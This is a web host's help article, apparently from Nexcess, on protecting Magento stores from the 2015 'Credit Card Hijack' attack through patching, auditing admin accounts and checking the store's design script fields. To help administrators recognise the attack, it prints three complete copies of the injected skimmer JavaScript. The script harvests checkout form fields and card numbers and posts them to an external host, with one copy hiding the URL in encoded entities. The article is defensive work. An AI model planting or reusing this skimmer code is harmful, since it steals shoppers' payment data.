Contact
Site: US UK AU |

How to protect your Magento store from the Credit Card Hijack exploit

How to protect your Magento store from the Credit Card Hijack exploit

Overview
This article explains how Magento store administrators can address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.

Background

First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.

Solution

Attention: In addition to the below actions, we strongly recommend you to enlist the services of a Magento developer or security specialist to audit your code. 

Take the following actions to safeguard the security of your store and your customers’ data.

1: Apply the latest patch

A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.

Take the following steps:

  1. Identify the most current version by visiting the security center page of the Magento website.

  2. Visit magereport.com to scan your store and identify your store’s version. If it matches the current version, skip to the "2: Review and secure admin users" section. Otherwise, proceed to Step 3.

  3. Patch your store. See How to patch your Magento store for more information.

2: Review and secure admin users

Use the below procedure to audit and secure your admin users. 

  1. From the Admin Panel, select System > Permissions > Roles (Figure 1).


    Figure 1. Magento Admin Panel; System > Permissions > Roles.

  2. Remove all accounts not in use, then set new, strong passwords for your remaining admin accounts. See How to create a secure password for more information.

3: Identify and remove unknown scripts

  1. From the Admin Panel, select System > Configuration (Figure 2).


    Figure 2. Magento Admin Panel; System > Configuration.

  2. From the Configuration menu, select General > Design (Figure 3).


    Figure 3. Configuration menu; General > Design.

  3. From the Design menu, click HTML Head and Footer (Figure 4).


    Figure 4. Design menu; HTML Head and Footer selections.

  4. If the Miscellaneous Scripts and Miscellaneous HTML fields are empty, proceed to the next section. Otherwise, continue to Step 5.

  5. If the Miscellaneous Scripts and Miscellaneous HTML are not empty, ask your developer to search for code similar to the following examples of the Credit Card Hijack exploit’s malicious code:

    <script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||
    document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll
    ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html
    ("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),
    u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
    <script>
    var snd =null;
    window.onload = function () {
    if((new RegExp('onepage')).test(window.location)) {
    send();
    }
    };

    function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox");
    for (var i=0;i<inp.length;i++){

    if(inp[i].value.length>0) {
    var nme=inp[i].name;
    if(nme=='') { nme=i; }
    snd+=inp[i].name+'='+inp[i].value+'&';
    }
    }

    }

    function send() {
    var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
    for (var i=0;i<btn.length;i++){
    var b=btn[i];
    if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
    if(b.addEventListener) {
    b.addEventListener("click", clk, false);
    }else {
    b.attachEvent('onclick', clk);
    }
    }

    }

    var frm=document.querySelectorAll("form");
    for (var i=0;i<frm.length;i++){
    if(frm[i].addEventListener) {
    frm[i].addEventListener("submit", clk, false);
    }else {
    frm[i].attachEvent('onsubmit', clk);
    }
    }

    if(snd!=null) {
    console.clear();
    var cc = new RegExp("[0-9]{13,16}");
    var asd="0";
    if(cc.test(snd)){
    asd="1" ;
    }
    var http = new XMLHttpRequest();
    http.open("POST","https://bad.guy/jquery.php",true);
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym");
    console.clear();
    }
    snd=null;
    setTimeout('send()', 150);
    }

    </script>
<script> function jj(e) { var t = "; " + document.cookie
, o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
, jQuery(function (e) {
e("button").on("click", function () {
var t = ""
, o = "post"
, n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i)
, t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}")
, u = new XMLHttpRequest;
u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
, u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
, u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
, console.clear()
}
}
})
});
</script>

4: Keep your store secure by following best practices

Attackers are constantly refining and honing their methods. To help secure your store against future exploits and attacks, follow the guidelines provided How to improve the security of your Magento store.

 

For 24-hour assistance any day of the year, contact our Support Team by email or through the Client Portal.

Article Rating (No Votes)
Rate this article
  • Icon PDFExport to PDF
  • Icon MS-WordExport to MS Word
 
Attachments Attachments
There are no attachments for this article.
Related Articles RSS Feed
How to optimize Magento performance
Added on Mon, Jul 29, 2013
How to perform Magento database maintenance
Added on Tue, Jul 30, 2013
What is Turpentine?
Added on Thu, Aug 28, 2014
How to find and remove hanging Magento cron jobs with SSH
Added on Thu, Oct 30, 2014
How to create Magento and WordPress dev sites
Added on Wed, Aug 3, 2016
How to purchase Nexcess shared hosting plans
Added on Mon, Jan 4, 2016
What are some useful Magento scripts?
Added on Mon, Oct 13, 2014
How to set the return-path email in Magento
Added on Thu, Oct 30, 2014
How to configure Magento to use your SSL certificate
Added on Mon, Feb 29, 2016
How to flush your Magento cache
Added on Tue, Mar 1, 2016